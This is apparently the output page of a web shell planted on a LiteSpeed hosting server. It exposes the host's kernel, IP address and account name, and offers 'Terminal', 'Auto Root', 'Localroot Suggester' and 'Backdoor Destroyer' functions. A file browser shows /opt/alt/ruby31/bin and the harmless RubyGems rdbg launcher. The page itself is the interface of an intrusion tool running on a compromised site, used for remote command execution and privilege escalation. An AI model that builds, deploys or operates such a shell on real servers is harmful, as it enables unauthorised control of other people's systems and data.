Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.198
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby31 /
bin /
Delete
Unzip
Name
Size
Permission
Date
Action
bundle
571
B
-rwxr-xr-x
2025-04-28 21:06
bundler
573
B
-rwxr-xr-x
2025-04-28 21:06
erb
532
B
-rwxr-xr-x
2025-04-28 21:06
gem
553
B
-rwxr-xr-x
2025-04-28 21:06
irb
532
B
-rwxr-xr-x
2025-04-28 21:06
rackup
550
B
-rwxr-xr-x
2023-09-21 09:58
rake
538
B
-rwxr-xr-x
2025-04-28 21:06
rbs
532
B
-rwxr-xr-x
2025-04-28 21:06
rdbg
542
B
-rwxr-xr-x
2025-04-28 21:06
rdoc
538
B
-rwxr-xr-x
2025-04-28 21:06
ri
534
B
-rwxr-xr-x
2025-04-28 21:06
ruby
11.82
KB
-rwxr-xr-x
2025-04-28 21:06
typeprof
562
B
-rwxr-xr-x
2025-04-28 21:06
Save
Rename
#!/opt/alt/ruby31/bin/ruby # # This file was generated by RubyGems. # # The application 'debug' is installed as part of a gem, and # this file is here to facilitate running it. # require 'rubygems' Gem.use_gemdeps version = ">= 0.a" str = ARGV.first if str str = str.b[/\A_(.*)_\z/, 1] if str and Gem::Version.correct?(str) version = str ARGV.shift end end if Gem.respond_to?(:activate_bin_path) load Gem.activate_bin_path('debug', 'rdbg', version) else gem "debug", version load Gem.bin_path("debug", "rdbg", version) end